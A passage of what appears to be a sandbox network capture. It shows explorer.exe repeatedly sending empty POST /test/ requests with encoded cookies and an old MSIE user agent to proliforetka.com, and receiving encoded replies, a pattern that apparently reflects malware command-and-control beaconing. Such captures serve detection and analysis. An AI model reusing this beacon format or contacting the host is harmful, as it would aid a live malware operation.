                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:30 UTC | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bGaMJy8Z6pCbSh%2FjuqtlSgi18wVMKJFxD%2FalsF2KbdSUGCfenvb3u3PFWieF%2BO4PzRxh59rI3B357FqH7A5EDJju9k9VbroomiBOAuUF0dE4t0ZnrsLE9yzJuO5BwV3WZbhm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875515b46de97-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1705&rtt_var=644&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1692753&cwnd=228&unsent_bytes=0&cid=f4f5367a940f301e&ts=760&x=0"
                                                                                                                                2024-12-17 16:58:30 UTC347INData Raw: 31 35 34 0d 0a 6e 56 70 71 49 73 70 4b 76 46 66 39 4a 4a 59 33 67 54 5a 4b 47 33 44 43 68 75 4a 57 72 6b 79 7a 47 30 4e 59 68 33 50 62 42 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 55 4a 33 42 76 39 41 37 58 6a 36 31 4f 42 6f 76 48 44 55 66 5a 48 78 58 6b 59 69 6e 35 34 73 75 65 65 77 44 2b 61 4c 72 36 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 2f 54 73 41 34 51 6b 4f 4a 56 58 37 78 36 52 4d 30 76 57 74 73 32 72 4f 30 71 6d 4f 37 52 48 79 43 32 49 59 76 5a 69 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 50 66
                                                                                                                                Data Ascii: 154nVpqIspKvFf9JJY3gTZKG3DChuJWrkyzG0NYh3PbBALp5exDOPARyFkPbnOUJ3Bv9A7Xj61OBovHDUfZHxXkYin54sueewD+aLr6Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9Q/TsA4QkOJVX7x6RM0vWts2rO0qmO7RHyC2IYvZiMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IPf
                                                                                                                                2024-12-17 16:58:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.6 | 50034 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:31 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:32 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGFTomKzhOi4dywmNqL1A48YsMQGqD5i%2FuS2qdn7qw6FKS42WD9YnNnhAEY59otALT2EVMVy%2FxW34peu4bEGn7vndmgB0uJYivI%2FFGzfgCKWF6%2FLKuguDblGlJv%2Bv2qP8gTa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38755e2b694344-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2346&min_rtt=2314&rtt_var=932&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1135303&cwnd=47&unsent_bytes=0&cid=32c48a1afc358850&ts=729&x=0"
                                                                                                                                2024-12-17 16:58:32 UTC347INData Raw: 31 35 34 0d 0a 6d 6c 4e 75 49 73 4a 4d 76 56 66 32 49 5a 59 77 69 54 70 4b 47 33 7a 4d 69 65 74 53 72 45 32 7a 47 30 6c 66 68 6e 66 66 42 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 57 49 48 78 70 38 51 50 55 6a 36 70 47 42 49 66 46 42 30 76 5a 47 42 6e 72 61 79 37 34 34 4d 75 66 66 41 76 30 62 37 44 33 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 58 73 41 49 30 6b 50 70 56 54 36 68 36 61 4e 6b 2f 53 74 73 69 76 50 55 6d 69 50 39 34 74 77 69 71 4c 62 66 70 67 66 37 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mlNuIsJMvVf2IZYwiTpKG3zMietSrE2zG0lfhnffBALp5exDOPARyFkPbnOWIHxp8QPUj6pGBIfFB0vZGBnray744MuffAv0b7D3Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPXsAI0kPpVT6h6aNk/StsivPUmiP94twiqLbfpgf7BDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.6 | 50035 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:34 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:35 UTC | 817 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFdl8%2FnY1c2obO7rAG%2B%2Fat4huN8g0rVvwp2rn%2B66WQdVfa5T%2F6eocPqxYKzPDjOXSWDt2M7NwLOm7HuF1vKB%2BFAsawdOpwiGtb73vhpUJ%2Bq9SxMNoguMtmJTdf2j5Du6XuyC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38756efcc132ca-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2009&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1426477&cwnd=221&unsent_bytes=0&cid=59ac9bdc4a7dc546&ts=757&x=0"
                                                                                                                                2024-12-17 16:58:35 UTC347INData Raw: 31 35 34 0d 0a 6d 46 39 73 4a 73 52 4f 76 31 66 33 4c 5a 4d 37 67 54 56 48 47 33 37 4d 68 75 70 53 71 55 36 7a 48 55 6c 59 68 48 58 66 44 51 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 49 58 39 68 38 67 50 51 6a 36 64 47 41 6f 54 41 44 30 50 5a 45 68 62 72 5a 53 7a 35 34 63 75 66 65 51 37 30 61 37 54 39 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 54 50 48 69 44 6f 41 6d 50 70 56 51 37 42 36 53 4d 6b 2f 55 74 73 75 72 4e 30 2b 67 4d 74 73 74 77 43 79 4a 61 2f 78 73 65 4c 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mF9sJsROv1f3LZM7gTVHG37MhupSqU6zHUlYhHXfDQLp5exDOPARyFkPbnOTIX9h8gPQj6dGAoTAD0PZEhbrZSz54cufeQ70a7T9Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9TPHiDoAmPpVQ7B6SMk/UtsurN0+gMtstwCyJa/xseLBDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.6 | 50036 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:36 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:37 UTC | 815 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:37 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjzW4cLPZsmr40gVxZaEO7tZaDsbnmsOz2KYCwxQ5Vfve1To7p1UM2hlGkaXIJ2AmYs2h%2FFMVZ0tzmvg7nbbOO%2Bxs1WGBY%2BC2VKh%2BlnPEBCxLMe%2BpVuoIZtsOYGDNlGHemVQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38757be8bc42e1-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1604&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1808049&cwnd=232&unsent_bytes=0&cid=0be26757fa7cb2bd&ts=803&x=0"
                                                                                                                                2024-12-17 16:58:37 UTC343INData Raw: 31 35 30 0d 0a 6c 6c 74 72 4b 63 5a 4a 76 31 66 32 4a 35 77 31 69 54 64 4c 47 33 44 4f 68 2b 78 63 72 6b 43 7a 47 45 42 59 68 48 48 62 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 36 55 4a 33 39 76 38 77 36 34 35 61 68 50 44 34 50 47 43 67 2b 57 47 78 62 6e 61 79 43 54 35 61 79 64 63 51 6e 2f 61 50 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 54 42 54 66 50 74 41 49 4e 50 4f 66 35 52 36 68 61 52 4d 51 58 52 2f 63 6d 73 50 55 79 6c 56 4e 6c 46 77 69 6d 4b 62 76 6b 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 7a 4e 76
                                                                                                                                Data Ascii: 150lltrKcZJv1f2J5w1iTdLG3DOh+xcrkCzGEBYhHHbSXPurONKPOMWz0dOaU6UJ39v8w645ahPD4PGCg+WGxbnayCT5aydcQn/aP/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxTBTfPtAINPOf5R6haRMQXR/cmsPUylVNlFwimKbvkoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgzNv
                                                                                                                                2024-12-17 16:58:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.6 | 50037 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:38 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:39 UTC | 813 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rb%2BdR9KoFjWhp7Ev9pgXaXHXvFw5QCzZf5NbzS0CrFeM1dKhrgyKAGxvMnPL0NqbU%2B%2B516oUNFQiPkL0u523qKJaTlCLFayN%2FstYzgpkl0VawOdfVToSpGR37D5w4GUML%2FJH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387589187441b5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1778&rtt_var=695&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1541710&cwnd=207&unsent_bytes=0&cid=942357b7b1bd4c31&ts=795&x=0"
                                                                                                                                2024-12-17 16:58:39 UTC347INData Raw: 31 35 34 0d 0a 6e 31 70 6e 4a 73 42 4a 75 31 66 78 49 35 77 37 68 54 64 48 47 33 33 4d 69 4f 74 54 6f 55 69 7a 47 55 42 66 68 48 66 55 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 56 4c 6e 31 71 39 41 54 66 6a 36 78 43 41 34 54 45 44 45 44 5a 48 68 6a 6a 5a 79 6a 34 6a 36 32 59 63 51 33 38 62 4c 71 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 43 52 76 54 74 41 6f 42 50 50 50 6c 53 36 68 57 53 4d 77 58 59 2b 4d 71 6f 4e 30 4b 69 56 4e 4a 44 77 43 71 45 61 2f 77 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 7a 4e 66
                                                                                                                                Data Ascii: 154n1pnJsBJu1fxI5w7hTdHG33MiOtToUizGUBfhHfUAALp5exDOPARyFkPbnOVLn1q9ATfj6xCA4TEDEDZHhjjZyj4j62YcQ38bLqyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvCRvTtAoBPPPlS6hWSMwXY+MqoN0KiVNJDwCqEa/woQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWgzNf
                                                                                                                                2024-12-17 16:58:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.6 | 50038 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:40 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX2LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:41 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B432KrMtjjndcduCuBCMpxmVi5OCS3dPjtZgC%2BskF67nb3QoV3InhyqXWFq%2F62mNv6OwRuX9E7lqKNd0vZqyjI8uV80PPtE6gjtYiJ%2FDA9F%2FjQVCrm%2BfFza59hRd6S4GOP5p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f387595baf643eb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2633&min_rtt=2121&rtt_var=1161&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1376709&cwnd=183&unsent_bytes=0&cid=a93ac95b4f5e70ba&ts=799&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
43 | 192.168.2.6 | 50039 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:42 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:43 UTC | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vx5B823ZaA%2BtLcTS7KergGzu2ip6YlEYmf9e%2FrmeUAmy4y0rB0l6VwzG7%2FRtM1SOpyKcX83YToJc0h5zmGfK08G5HwLJedYHotwbTIlh6N2UhV92kMMrfz0Oa7oVfFC%2BPLi5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875a47a8f43d0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2559&min_rtt=2504&rtt_var=978&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1166134&cwnd=181&unsent_bytes=0&cid=fc046d0208daa25b&ts=798&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
44 | 192.168.2.6 | 50040 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:45 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:46 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WA7UarMiYwRX5pNB1HhKmTcjIlsZFXdwJVGybHGnipJ2fZXGW1h3Q1k52G%2Fh7tsrAO3lkK4mXc1POmPXvoP1kJbqtt62kweygMaP%2B0rEDkX5JBOgkcr54Yna3HBnK4sWHrTd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875b75a150fa3-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=50026&min_rtt=1748&rtt_var=29296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1670480&cwnd=222&unsent_bytes=0&cid=a8f8cca221cb75ed&ts=925&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
45 | 192.168.2.6 | 50041 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:48 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxJoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:58:49 UTC | 821 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qm%2Fj714HjK%2BkWaOsfg4JPow%2F2aLfyHsYH9GO3IdjNYS%2FEpblXPF%2BieHR3rfX03jiFjKnIpqzm5OsrLWIm5HnEF%2FQUegj8MwDLQ4tj0hpIytWVij7AR%2F6M648%2FYiMszcdr%2Fps"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875c75f7a8cbd-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2322&min_rtt=2319&rtt_var=877&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1242553&cwnd=180&unsent_bytes=0&cid=81558de52bcf120b&ts=758&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port
46 | 192.168.2.6 | 50042 | 172.67.161.60 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:58:50 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
